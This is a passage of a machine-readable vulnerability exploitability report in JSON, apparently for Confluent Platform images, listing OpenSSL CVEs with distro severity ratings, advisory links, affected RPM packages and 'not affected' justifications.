          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-69418",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        325
      ],
      "description": "Issue summary: When using the low-level OCB API directly with AES-NI or<br>other hardware-accelerated code paths, inputs whose length is not a multiple<br>of 16 bytes can leave the final partial block unencrypted and unauthenticated.<br><br>Impact summary: The trailing 1-15 bytes of a message may be exposed in<br>cleartext on encryption and are not covered by the authentication tag,<br>allowing an attacker to read or tamper with those bytes without detection.<br><br>The low-level OCB encrypt and decrypt routines in the hardware-accelerated<br>stream path process full 16-byte blocks but do not advance the input/output<br>pointers. The subsequent tail-handling code then operates on the original<br>base pointers, effectively reprocessing the beginning of the buffer while<br>leaving the actual trailing bytes unprocessed. The authentication checksum<br>also excludes the true tail bytes.<br><br>However, typical OpenSSL consumers using EVP are not affected because the<br>higher-level EVP and provider OCB implementations split inputs so that full<br>blocks and trailing partial blocks are processed in separate calls, avoiding<br>the problematic code path. Additionally, TLS does not use OCB ciphersuites.<br>The vulnerability only affects applications that call the low-level<br>CRYPTO_ocb128_encrypt() or CRYPTO_ocb128_decrypt() functions directly with<br>non-block-aligned lengths in a single call on hardware-accelerated builds.<br>For these reasons the issue was assessed as Low severity.<br><br>The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected<br>by this issue, as OCB mode is not a FIPS-approved algorithm.<br><br>OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.<br><br>OpenSSL 1.0.2 is not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-69418"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-69418"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-78qr-24v5-7q73"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/372fc5c77529695b05b4f5b5187691a57ef5dffc"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4016975d4469cd6b94927c607f7c511385f928d8"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/52d23c86a54adab5ee9f80e48b242b52c4cc2347"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a7589230356d908c0eca4b969ec4f62106f4f5ae"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ed40856d7d4ba6cb42779b6770666a65f19cb977"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-69418.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69418"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-69418"
        }
      ],
      "published": "2026-01-27T16:16:33+00:00",
      "updated": "2026-06-17T10:00:39+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-69420",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        754
      ],
      "description": "Issue summary: A type confusion vulnerability exists in the TimeStamp Response\nverification code where an ASN1_TYPE union member is accessed without first\nvalidating the type, causing an invalid or NULL pointer dereference when\nprocessing a malformed TimeStamp Response file.\n\nImpact summary: An application calling TS_RESP_verify_response() with a\nmalformed TimeStamp Response can be caused to dereference an invalid or\nNULL pointer when reading, resulting in a Denial of Service.\n\nThe functions ossl_ess_get_signing_cert() and ossl_ess_get_signing_cert_v2()\naccess the signing cert attribute value without validating its type.\nWhen the type is not V_ASN1_SEQUENCE, this results in accessing invalid memory\nthrough the ASN1_TYPE union, causing a crash.\n\nExploiting this vulnerability requires an attacker to provide a malformed\nTimeStamp Response to an application that verifies timestamp responses. The\nTimeStamp protocol (RFC 3161) is not widely used and the impact of the\nexploit is just a Denial of Service. For these reasons the issue was\nassessed as Low severity.\n\nThe FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the TimeStamp Response implementation is outside the OpenSSL FIPS module\nboundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.\n\nOpenSSL 1.0.2 is not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-69420"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-69420"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-w42r-ph9f-9x66"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/27c7012c91cc986a598d7540f3079dfde2416eb9"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4e254b48ad93cc092be3dd62d97015f33f73133a"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/564fd9c73787f25693bf9e75faf7bf6bb1305d4e"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/5eb0770ffcf11b785cf374ff3c19196245e54f1b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a99349ebfc519999edc50620abe24d599b9eb085"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-69420.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69420"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-69420"
        }
      ],
      "published": "2026-01-27T16:16:34+00:00",
      "updated": "2026-06-17T10:00:40+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
